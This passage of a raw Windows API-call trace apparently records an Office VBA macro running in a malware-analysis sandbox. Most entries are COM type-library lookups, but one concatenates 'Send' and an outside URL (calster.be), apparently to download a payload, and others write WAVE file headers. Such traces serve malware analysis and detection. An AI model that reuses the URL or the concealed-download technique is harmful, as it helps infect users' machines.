cchWideChar=29 | out: lpWideCharStr="_B_var_DDBLTFAST_SRCCOLORKEY") returned 29 [0033.254] IUnknown:AddRef (This=0x782a220) returned 0x1b [0033.254] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_DDBLTFAST_SRCCOLORKEY", lHashVal=0x108f81, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0033.254] IUnknown:Release (This=0x782a220) returned 0x1a [0033.254] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.254] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_DDBLTFAST_SRCCOLORKEY", lHashVal=0x108f81, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0033.254] IUnknown:Release (This=0x731da90) returned 0x15 [0033.254] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.254] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_DDBLTFAST_SRCCOLORKEY", lHashVal=0x108f81, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0033.254] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.254] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.254] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_DDBLTFAST_SRCCOLORKEY", lHashVal=0x108f81, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0033.254] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.254] IUnknown:AddRef (This=0x782b300) returned 0x7 [0033.254] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_DDBLTFAST_SRCCOLORKEY", lHashVal=0x108f81, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0033.254] IUnknown:Release (This=0x782b300) returned 0x6 [0033.254] IUnknown:AddRef (This=0x782a220) returned 0x1b [0033.254] IUnknown:Release (This=0x782a220) returned 0x1a [0033.254] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_BackBuffer") returned 0x109d05 [0033.254] IUnknown:AddRef (This=0x782a220) returned 0x1b [0033.254] IUnknown:Release (This=0x782a220) returned 0x1a [0033.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a520ce, cbMultiByte=9, lpWideCharStr=0x2e4560, cchWideChar=8 | out: lpWideCharStr="BltFast") returned 0 [0033.254] IMalloc:Free (This=0x7fefe015380, pv=0x78463a0) [0033.254] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5a5018, ppTypeAttr=0x2e3ff0, pDummy=0x0 | out: ppTypeAttr=0x2e3ff0, pDummy=0x0) returned 0x0 [0033.254] ITypeInfo:LocalReleaseTypeAttr (This=0xb5a5018) returned 0x0 [0033.254] IMalloc:Free (This=0x7fefe015380, pv=0x78463a0) [0033.254] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b1ee8, ppTypeAttr=0x2e4230, pDummy=0x0 | out: ppTypeAttr=0x2e4230, pDummy=0x0) returned 0x0 [0033.254] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b1ee8) returned 0x0 [0033.254] IMalloc:Free (This=0x7fefe015380, pv=0x78463a0) [0033.254] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5a5018, ppTypeAttr=0x2e40e0, pDummy=0x0 | out: ppTypeAttr=0x2e40e0, pDummy=0x0) returned 0x0 [0033.254] ITypeInfo:LocalReleaseTypeAttr (This=0xb5a5018) returned 0x0 [0033.254] IMalloc:Free (This=0x7fefe015380, pv=0x78463a0) [0033.254] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b23b8, ppTypeAttr=0x2e4320, pDummy=0x0 | out: ppTypeAttr=0x2e4320, pDummy=0x0) returned 0x0 [0033.254] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b23b8) returned 0x0 [0033.255] IMalloc:Free (This=0x7fefe015380, pv=0x780f0c0) [0033.255] SetErrorMode (uMode=0x8001) returned 0x8005 [0033.255] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0033.256] SetErrorMode (uMode=0x8005) returned 0x8005 [0033.256] GetProcAddress (hModule=0x7fee36e0000, lpProcName=0x2cb) returned 0x7fee39d5aa0 [0033.257] VarBstrCat (in: bstrLeft="Se", bstrRight="nd", pbstrResult=0x2e6070 | out: pbstrResult=0x2e6070) returned 0x0 [0033.257] VarBstrCat (in: bstrLeft="http://", bstrRight="calster.be/87wifhFsdf", pbstrResult=0x2e6070 | out: pbstrResult=0x2e6070) returned 0x0 [0033.257] IUnknown:Release (This=0xb4db9e8) returned 0x4 [0033.258] IMalloc:Free (This=0x7fefe015380, pv=0xb5a6150) [0033.258] IUnknown:AddRef (This=0xb5a5078) returned 0x8 [0033.258] ITypeInfo:GetRefTypeOfImplType (in: This=0xb5a5078, index=0xffffffff, pRefType=0x2e4330 | out: pRefType=0x2e4330*=0xfffffffe) returned 0x0 [0033.258] ITypeInfo:GetRefTypeInfo (in: This=0xb5a5078, hreftype=0xfffffffe, ppTInfo=0x2e4408 | out: ppTInfo=0x2e4408*=0xb5a5018) returned 0x0 [0033.258] IUnknown:Release (This=0xb5a5078) returned 0x7 [0033.258] ITypeInfo:GetRefTypeInfo (in: This=0xb5a5018, hreftype=0x25, ppTInfo=0x2e3b98 | out: ppTInfo=0x2e3b98*=0xb5b1d88) returned 0x0 [0033.258] IUnknown:QueryInterface (in: This=0xb5b1d88, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e3d68 | out: ppvObject=0x2e3d68*=0x0) returned 0x80004002 [0033.258] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b1d88, ppTypeAttr=0x2e3be8, pDummy=0x10 | out: ppTypeAttr=0x2e3be8, pDummy=0x10) returned 0x0 [0033.258] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b1d88) returned 0x0 [0033.259] IUnknown:QueryInterface (in: This=0xb5b1d88, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e38f0 | out: ppvObject=0x2e38f0*=0x0) returned 0x80004002 [0033.259] IUnknown:QueryInterface (in: This=0xb5b1d88, riid=0x7fee3a7add8*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e38e0 | out: ppvObject=0x2e38e0*=0x0) returned 0x80004002 [0033.259] IUnknown:QueryInterface (in: This=0xb5b1d88, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e38e8 | out: ppvObject=0x2e38e8*=0x0) returned 0x80004002 [0033.259] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b1d88, ppTypeAttr=0x2e3918, pDummy=0x10 | out: ppTypeAttr=0x2e3918, pDummy=0x10) returned 0x0 [0033.259] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b1d88) returned 0x0 [0033.259] IUnknown:AddRef (This=0xb5b1d88) returned 0x3 [0033.259] IUnknown:QueryInterface (in: This=0xb5b1d88, riid=0x7fee3a7add8*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e3a90 | out: ppvObject=0x2e3a90*=0x0) returned 0x80004002 [0033.259] IUnknown:QueryInterface (in: This=0xb5b1d88, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e3a88 | out: ppvObject=0x2e3a88*=0x0) returned 0x80004002 [0033.259] IUnknown:Release (This=0xb5b1d88) returned 0x2 [0033.259] IUnknown:AddRef (This=0xb5b1d88) returned 0x3 [0033.259] IUnknown:AddRef (This=0xb5b1d88) returned 0x3 [0033.259] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5a5018, ppTypeAttr=0x2e4808, pDummy=0x0 | out: ppTypeAttr=0x2e4808, pDummy=0x0) returned 0x0 [0033.259] ITypeInfo:LocalReleaseTypeAttr (This=0xb5a5018) returned 0x0 [0033.259] IUnknown:Release (This=0xb5a5018) returned 0x8 [0033.259] IMalloc:Free (This=0x7fefe015380, pv=0x78463a0) [0033.259] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5a5018, ppTypeAttr=0x2e3da0, pDummy=0x0 | out: ppTypeAttr=0x2e3da0, pDummy=0x0) returned 0x0 [0033.259] ITypeInfo:LocalReleaseTypeAttr (This=0xb5a5018) returned 0x0 [0033.259] IMalloc:Alloc (This=0x7fefe015380, cb=0x38) returned 0x75dc570 [0033.259] IUnknown:Release (This=0xb5b1d88) returned 0x2 [0033.260] IUnknown:QueryInterface (in: This=0xb5b1f98, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e43d0 | out: ppvObject=0x2e43d0*=0x0) returned 0x80004002 [0033.260] IUnknown:QueryInterface (in: This=0xb5b1f98, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e43a0 | out: ppvObject=0x2e43a0*=0x0) returned 0x80004002 [0033.260] IUnknown:QueryInterface (in: This=0xb5b1f98, riid=0x7fee3a7add8*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4390 | out: ppvObject=0x2e4390*=0x0) returned 0x80004002 [0033.260] IUnknown:QueryInterface (in: This=0xb5b1f98, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4398 | out: ppvObject=0x2e4398*=0x0) returned 0x80004002 [0033.260] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b1f98, ppTypeAttr=0x2e43c8, pDummy=0x10 | out: ppTypeAttr=0x2e43c8, pDummy=0x10) returned 0x0 [0033.260] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b1f98) returned 0x0 [0033.260] IUnknown:AddRef (This=0xb5b1f98) returned 0x3 [0033.260] IUnknown:AddRef (This=0xb5b1f98) returned 0x3 [0033.260] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b1f98, ppTypeAttr=0x2e4808, pDummy=0x9e407f0 | out: ppTypeAttr=0x2e4808, pDummy=0x9e407f0*=0x0) returned 0x0 [0033.260] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b1f98) returned 0x0 [0033.260] IUnknown:Release (This=0xb5b1f98) returned 0x2 [0033.260] IMalloc:Free (This=0x7fefe015380, pv=0x78463a0) [0033.260] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b1f98, ppTypeAttr=0x2e3da0, pDummy=0x0 | out: ppTypeAttr=0x2e3da0, pDummy=0x0) returned 0x0 [0033.260] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b1f98) returned 0x0 [0033.260] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="c") returned 0x10105a [0033.260] strcpy_s (in: _Dst=0x2e43e0, _DstSize=0x2, _Src="c" | out: _Dst="c") returned 0x0 [0033.260] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e43e0, cbMultiByte=2, lpWideCharStr=0x2e4230, cchWideChar=2 | out: lpWideCharStr="c") returned 2 [0033.260] IUnknown:AddRef (This=0x782a220) returned 0x1b [0033.260] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="c", lHashVal=0x10105a, pfName=0x2e4300, pBstrLibName=0x2e4230 | out: pfName=0x2e4300*=0, pBstrLibName=0x2e4230) returned 0x0 [0033.260] IUnknown:Release (This=0x782a220) returned 0x1a [0033.260] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.260] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="c", lHashVal=0x10105a, pfName=0x2e4300, pBstrLibName=0x2e4230 | out: pfName=0x2e4300*=0, pBstrLibName=0x2e4230) returned 0x0 [0033.260] IUnknown:Release (This=0x731da90) returned 0x15 [0033.260] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.260] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="c", lHashVal=0x10105a, pfName=0x2e4300, pBstrLibName=0x2e4230 | out: pfName=0x2e4300*=0, pBstrLibName=0x2e4230) returned 0x0 [0033.260] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.260] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.260] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="c", lHashVal=0x10105a, pfName=0x2e4300, pBstrLibName=0x2e4230 | out: pfName=0x2e4300*=0, pBstrLibName=0x2e4230) returned 0x0 [0033.260] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.261] IMalloc:Alloc (This=0x7fefe015380, cb=0x9) returned 0xb4963f0 [0033.261] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_c") returned 0x10a203 [0033.261] strcpy_s (in: _Dst=0x2e4590, _DstSize=0x9, _Src="_B_var_c" | out: _Dst="_B_var_c") returned 0x0 [0033.261] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4590, cbMultiByte=9, lpWideCharStr=0x2e43e0, cchWideChar=9 | out: lpWideCharStr="_B_var_c") returned 9 [0033.261] IUnknown:AddRef (This=0x782a220) returned 0x1b [0033.261] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_c", lHashVal=0x10a203, pfName=0x2e44b0, pBstrLibName=0x2e43e0 | out: pfName=0x2e44b0*=0, pBstrLibName=0x2e43e0) returned 0x0 [0033.261] IUnknown:Release (This=0x782a220) returned 0x1a [0033.261] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.261] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_c", lHashVal=0x10a203, pfName=0x2e44b0, pBstrLibName=0x2e43e0 | out: pfName=0x2e44b0*=0, pBstrLibName=0x2e43e0) returned 0x0 [0033.261] IUnknown:Release (This=0x731da90) returned 0x15 [0033.261] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.261] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_c", lHashVal=0x10a203, pfName=0x2e44b0, pBstrLibName=0x2e43e0 | out: pfName=0x2e44b0*=0, pBstrLibName=0x2e43e0) returned 0x0 [0033.261] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.261] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.261] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_c", lHashVal=0x10a203, pfName=0x2e44b0, pBstrLibName=0x2e43e0 | out: pfName=0x2e44b0*=0, pBstrLibName=0x2e43e0) returned 0x0 [0033.261] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.261] IUnknown:AddRef (This=0x782b300) returned 0x7 [0033.261] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_c", lHashVal=0x10a203, pfName=0x2e44b0, pBstrLibName=0x2e43e0 | out: pfName=0x2e44b0*=0, pBstrLibName=0x2e43e0) returned 0x0 [0033.261] IUnknown:Release (This=0x782b300) returned 0x6 [0033.261] IUnknown:AddRef (This=0x782a220) returned 0x1b [0033.261] IUnknown:Release (This=0x782a220) returned 0x1a [0033.261] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51b0a, cbMultiByte=4, lpWideCharStr=0x2e42a0, cchWideChar=3 | out: lpWideCharStr="Ry") returned 0 [0033.261] wcscpy_s (in: _Destination=0xb5c8818, _SizeInWords=0x3, _Source="Ry" | out: _Destination="Ry") returned 0x0 [0033.261] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a609a6, cbMultiByte=8, lpWideCharStr=0x2e42a0, cchWideChar=7 | out: lpWideCharStr="Offset") returned 0 [0033.261] wcscpy_s (in: _Destination=0xb5c8828, _SizeInWords=0x7, _Source="Offset" | out: _Destination="Offset") returned 0x0 [0033.261] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb52fcc4, cbMultiByte=4, lpWideCharStr=0x9e43a2c, cchWideChar=10 | out: lpWideCharStr="RIFF") returned 4 [0033.261] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Encoding") returned 0x1052bc [0033.261] strcpy_s (in: _Dst=0x2e43e0, _DstSize=0x9, _Src="Encoding" | out: _Dst="Encoding") returned 0x0 [0033.261] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e43e0, cbMultiByte=9, lpWideCharStr=0x2e4230, cchWideChar=9 | out: lpWideCharStr="Encoding") returned 9 [0033.261] IUnknown:AddRef (This=0x782a220) returned 0x1b [0033.261] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="Encoding", lHashVal=0x1052bc, pfName=0x2e4300, pBstrLibName=0x2e4230 | out: pfName=0x2e4300*=0, pBstrLibName=0x2e4230) returned 0x0 [0033.261] IUnknown:Release (This=0x782a220) returned 0x1a [0033.261] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.261] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="Encoding", lHashVal=0x1052bc, pfName=0x2e4300, pBstrLibName=0x2e4230 | out: pfName=0x2e4300*=1, pBstrLibName=0x2e4230) returned 0x0 [0033.261] IUnknown:Release (This=0x731da90) returned 0x15 [0033.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Encoding", cchWideChar=-1, lpMultiByteStr=0x2e43e0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Encoding", lpUsedDefaultChar=0x0) returned 9 [0033.261] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Encoding") returned 0x1052bc [0033.261] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4963f0 [0033.262] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Encoding") returned 0x102a45 [0033.262] strcpy_s (in: _Dst=0x2e4590, _DstSize=0x10, _Src="_B_var_Encoding" | out: _Dst="_B_var_Encoding") returned 0x0 [0033.262] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4590, cbMultiByte=16, lpWideCharStr=0x2e43e0, cchWideChar=16 | out: lpWideCharStr="_B_var_Encoding") returned 16 [0033.262] IUnknown:AddRef (This=0x782a220) returned 0x1b [0033.262] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_Encoding", lHashVal=0x102a45, pfName=0x2e44b0, pBstrLibName=0x2e43e0 | out: pfName=0x2e44b0*=0, pBstrLibName=0x2e43e0) returned 0x0 [0033.262] IUnknown:Release (This=0x782a220) returned 0x1a [0033.262] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.262] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_Encoding", lHashVal=0x102a45, pfName=0x2e44b0, pBstrLibName=0x2e43e0 | out: pfName=0x2e44b0*=0, pBstrLibName=0x2e43e0) returned 0x0 [0033.262] IUnknown:Release (This=0x731da90) returned 0x15 [0033.262] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.262] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_Encoding", lHashVal=0x102a45, pfName=0x2e44b0, pBstrLibName=0x2e43e0 | out: pfName=0x2e44b0*=0, pBstrLibName=0x2e43e0) returned 0x0 [0033.262] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.262] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.262] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_Encoding", lHashVal=0x102a45, pfName=0x2e44b0, pBstrLibName=0x2e43e0 | out: pfName=0x2e44b0*=0, pBstrLibName=0x2e43e0) returned 0x0 [0033.262] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.262] IUnknown:AddRef (This=0x782b300) returned 0x7 [0033.262] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_Encoding", lHashVal=0x102a45, pfName=0x2e44b0, pBstrLibName=0x2e43e0 | out: pfName=0x2e44b0*=0, pBstrLibName=0x2e43e0) returned 0x0 [0033.262] IUnknown:Release (This=0x782b300) returned 0x6 [0033.262] IUnknown:AddRef (This=0x782a220) returned 0x1b [0033.262] IUnknown:Release (This=0x782a220) returned 0x1a [0033.262] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60a22, cbMultiByte=7, lpWideCharStr=0x2e42a0, cchWideChar=6 | out: lpWideCharStr="ASCII") returned 0 [0033.262] wcscpy_s (in: _Destination=0xb5c8858, _SizeInWords=0x6, _Source="ASCII" | out: _Destination="ASCII") returned 0x0 [0033.262] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60a4a, cbMultiByte=10, lpWideCharStr=0x2e42a0, cchWideChar=9 | out: lpWideCharStr="GetBytes") returned 0 [0033.262] wcscpy_s (in: _Destination=0xb5c8870, _SizeInWords=0x9, _Source="GetBytes" | out: _Destination="GetBytes") returned 0x0 [0033.262] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="writer") returned 0x1076f6 [0033.262] strcpy_s (in: _Dst=0x2e43e0, _DstSize=0x7, _Src="writer" | out: _Dst="writer") returned 0x0 [0033.262] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e43e0, cbMultiByte=7, lpWideCharStr=0x2e4230, cchWideChar=7 | out: lpWideCharStr="writer") returned 7 [0033.262] IUnknown:AddRef (This=0x782a220) returned 0x1b [0033.262] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="writer", lHashVal=0x1076f6, pfName=0x2e4300, pBstrLibName=0x2e4230 | out: pfName=0x2e4300*=0, pBstrLibName=0x2e4230) returned 0x0 [0033.262] IUnknown:Release (This=0x782a220) returned 0x1a [0033.262] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.262] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="writer", lHashVal=0x1076f6, pfName=0x2e4300, pBstrLibName=0x2e4230 | out: pfName=0x2e4300*=0, pBstrLibName=0x2e4230) returned 0x0 [0033.262] IUnknown:Release (This=0x731da90) returned 0x15 [0033.262] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.262] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="writer", lHashVal=0x1076f6, pfName=0x2e4300, pBstrLibName=0x2e4230 | out: pfName=0x2e4300*=0, pBstrLibName=0x2e4230) returned 0x0 [0033.262] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.262] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.262] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="writer", lHashVal=0x1076f6, pfName=0x2e4300, pBstrLibName=0x2e4230 | out: pfName=0x2e4300*=0, pBstrLibName=0x2e4230) returned 0x0 [0033.262] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.262] IMalloc:Alloc (This=0x7fefe015380, cb=0xe) returned 0xb4963f0 [0033.262] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_writer") returned 0x10f19f [0033.262] strcpy_s (in: _Dst=0x2e4590, _DstSize=0xe, _Src="_B_var_writer" | out: _Dst="_B_var_writer") returned 0x0 [0033.262] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4590, cbMultiByte=14, lpWideCharStr=0x2e43e0, cchWideChar=14 | out: lpWideCharStr="_B_var_writer") returned 14 [0033.262] IUnknown:AddRef (This=0x782a220) returned 0x1b [0033.262] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_writer", lHashVal=0x10f19f, pfName=0x2e44b0, pBstrLibName=0x2e43e0 | out: pfName=0x2e44b0*=0, pBstrLibName=0x2e43e0) returned 0x0 [0033.263] IUnknown:Release (This=0x782a220) returned 0x1a [0033.263] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.263] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_writer", lHashVal=0x10f19f, pfName=0x2e44b0, pBstrLibName=0x2e43e0 | out: pfName=0x2e44b0*=0, pBstrLibName=0x2e43e0) returned 0x0 [0033.263] IUnknown:Release (This=0x731da90) returned 0x15 [0033.263] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.263] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_writer", lHashVal=0x10f19f, pfName=0x2e44b0, pBstrLibName=0x2e43e0 | out: pfName=0x2e44b0*=0, pBstrLibName=0x2e43e0) returned 0x0 [0033.263] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.263] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.263] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_writer", lHashVal=0x10f19f, pfName=0x2e44b0, pBstrLibName=0x2e43e0 | out: pfName=0x2e44b0*=0, pBstrLibName=0x2e43e0) returned 0x0 [0033.263] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.263] IUnknown:AddRef (This=0x782b300) returned 0x7 [0033.263] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_writer", lHashVal=0x10f19f, pfName=0x2e44b0, pBstrLibName=0x2e43e0 | out: pfName=0x2e44b0*=0, pBstrLibName=0x2e43e0) returned 0x0 [0033.263] IUnknown:Release (This=0x782b300) returned 0x6 [0033.263] IUnknown:AddRef (This=0x782a220) returned 0x1b [0033.263] IUnknown:Release (This=0x782a220) returned 0x1a [0033.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6821e0a, cbMultiByte=7, lpWideCharStr=0x2e42a0, cchWideChar=6 | out: lpWideCharStr="Write") returned 0 [0033.263] wcscpy_s (in: _Destination=0xb5c8890, _SizeInWords=0x6, _Source="Write" | out: _Destination="Write") returned 0x0 [0033.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6821e0a, cbMultiByte=7, lpWideCharStr=0x2e42a0, cchWideChar=6 | out: lpWideCharStr="Write") returned 0 [0033.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb52fcfc, cbMultiByte=4, lpWideCharStr=0x9d108cc, cchWideChar=10 | out: lpWideCharStr="WAVE") returned 4 [0033.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60a22, cbMultiByte=7, lpWideCharStr=0x2e42a0, cchWideChar=6 | out: lpWideCharStr="ASCII") returned 0 [0033.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60a4a, cbMultiByte=10, lpWideCharStr=0x2e42a0, cchWideChar=9 | out: lpWideCharStr="GetBytes") returned 0 [0033.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6821e0a, cbMultiByte=7, lpWideCharStr=0x2e42a0, cchWideChar=6 | out: lpWideCharStr="Write") returned 0 [0033.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb52fd24, cbMultiByte=4, lpWideCharStr=0x9d113ba, cchWideChar=10 | out: lpWideCharStr="fmt ") returned 4 [0033.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60a22, cbMultiByte=7, lpWideCharStr=0x2e42a0, cchWideChar=6 | out: lpWideCharStr="ASCII") returned 0 [0033.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60a4a, cbMultiByte=10, lpWideCharStr=0x2e42a0, cchWideChar=9 | out: lpWideCharStr="GetBytes") returned 0 [0033.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6821e0a, cbMultiByte=7, lpWideCharStr=0x2e42a0, cchWideChar=6 | out: lpWideCharStr="Write") returned 0 [0033.263] MultiByteToWideChar 